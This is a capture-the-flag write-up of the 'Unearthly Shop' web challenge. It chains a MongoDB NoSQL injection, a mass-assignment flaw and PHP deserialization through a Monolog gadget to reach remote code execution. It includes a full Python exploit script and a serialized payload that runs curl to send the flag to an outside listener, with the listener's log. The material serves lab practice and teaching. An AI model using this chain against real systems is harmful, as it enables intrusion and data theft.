[Web - hard] Unearthly Shop
Disclaimer: this challenge was not fully solved. The last part we needed was to include a class from outside the backend, and taken from HTB discord write-ups.
This webapp is written in PHP and uses a MongoDB database. It has 2 components:
- a frontend, that displays items in a store, and on which users can place bids
- a backend, through which an admin can login in order to view a Dashboard, and manage the Products, the Orders, and the Users
This webapp contains 2 vulnerabilities:
- listing the products is the as-is MongoDB query: it can be used with a NoSQL injection to list the products and the users, which will give the admin password (passwords are stored in clear, not using
for instance)
public function products($router)
$json = file_get_contents('php://input');
$query = json_decode($json, true);
if (!$query)
$router->jsonify(['message' => 'Insufficient parameters!'], 400);
$products = $this->product->getProducts($query);
- using the admin interface, the password change function can accept more than the password change: it can be used to modify other attributes of the user, such as the Access
public function update($router)
$json = file_get_contents('php://input');
$data = json_decode($json, true);
if (!$data['_id'] || !$data['username'] || !$data['password'])
$router->jsonify(['message' => 'Insufficient parameters!'], 400);
if ($this->user->updateUser($data)) {
$router->jsonify(['message' => 'User updated successfully!']);
- the Access of an user is a serialized PHP object. It is deserialized upon instanciation of a Controller, taking values from the user Session
class UserModel extends Model
public function __construct()
$this->username = $_SESSION['username'] ?? '';
$this->email = $_SESSION['email'] ?? '';
$this->access = unserialize($_SESSION['access'] ?? '');
class Controller
public $user;
public $access;
public $username;
public function __construct($privileged = False, $required_access = [])
$this->database = Database::getDatabase();
$this->user = new UserModel;
$this->product = new ProductModel;
$this->order = new OrderModel;
Thus the path to the flag is to:
- use the NoSQLi in the product listing to get the admin password
- login as the admin
- craft a serialized PHP object that will contain an RCE, exfiltrating the flag from the filesystem. In PHP the serialization needs to use a class that is present for instanciation. This application having 2 parts (frontend + backend), and since we are invoking it from the backend, we need to rely on this trick to
the corresponding class (this is what we were missing). The frontend includes a vulnerablemonolog
library, exploitable from a classic phpggc gadget - use that serialized object, and abuse the update password function to update the admin Access
- login and display the admin user info to instanciate the Controller, which will deserialize our payload, leading to an RCE
The final script is:
import requests
import json
import subprocess
endpoint = ""
def main():
s = requests.Session()
# NoSQLi for admin pass
response = s.post(endpoint + '/api/products', data = '[{"$match":{"instock":true}}, {"$unionWith": { "coll": "users" }}]')
admin_pass = json.loads(response.text)[-1]['password']
print("Admin password: {}".format(admin_pass))
# login with admin
response = s.post(endpoint + '/admin/api/auth/login', data = {"username": "admin", "password": admin_pass})
# https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
serial_object = 'a:2:{i:0;O:28:"www_frontend_vendor_autoload":0:{}i:1;'
# ./phpggc Monolog/RCE6 system "curl\$(/readflag)" -a 2>/dev/null | grep O:
serial_object += 'O:37:"Monolog\Handler\FingersCrossedHandler":3:{S:16:"\00*\00passthruLevel";i:0;S:9:"\00*\00buffer";a:1:{S:4:"test";a:2:{i:0;S:48:"curl$(/readflag)";S:5:"level";N;}}S:10:"\00*\00handler";O:29:"Monolog\Handler\BufferHandler":7:{S:10:"\00*\00handler";N;S:13:"\00*\00bufferSize";i:-1;S:9:"\00*\00buffer";N;S:8:"\00*\00level";N;S:14:"\00*\00initialized";b:1;S:14:"\00*\00bufferLimit";i:-1;S:13:"\00*\00processors";a:2:{i:0;S:7:"current";i:1;S:6:"system";}}}'
serial_object += '}'
# Update admin access serial object
# Normal access: a:4:{s:9:"Dashboard";b:1;s:7:"Product";b:1;s:5:"Order";b:1;s:4:"User";b:1;}
# to restore: use unearthly_shop; db.users.updateOne({username: "admin"},{$set: {access: 'a:4:{s:9:"Dashboard";b:1;s:7:"Product";b:1;s:5:"Order";b:1;s:4:"User";b:1;}'}});
response = s.post(endpoint + '/admin/api/users/update', json = {"_id": 1, "username": "admin", "password": admin_pass, "access": serial_object})
# unserialize at user creation, which is polluted at user login, and used in view
# login with admin
response = s.post(endpoint + '/admin/api/auth/login', data = {"username": "admin", "password": admin_pass})
response = s.get(endpoint + '/admin/api/users/1')
And on the HTTP listener:
pi@raspberrypi:/tmp/lol $ python -m http.server 4444
Serving HTTP on port 4444 ( ... - - [25/Mar/2023 16:19:36] "GET /?c=HTBl00kup_4r7if4c75_4nd_4u70lo4d_g4dg37s HTTP/1.1" 200 - - - [25/Mar/2023 16:19:37] "GET /?c=HTBl00kup_4r7if4c75_4nd_4u70lo4d_g4dg37s HTTP/1.1" 200 -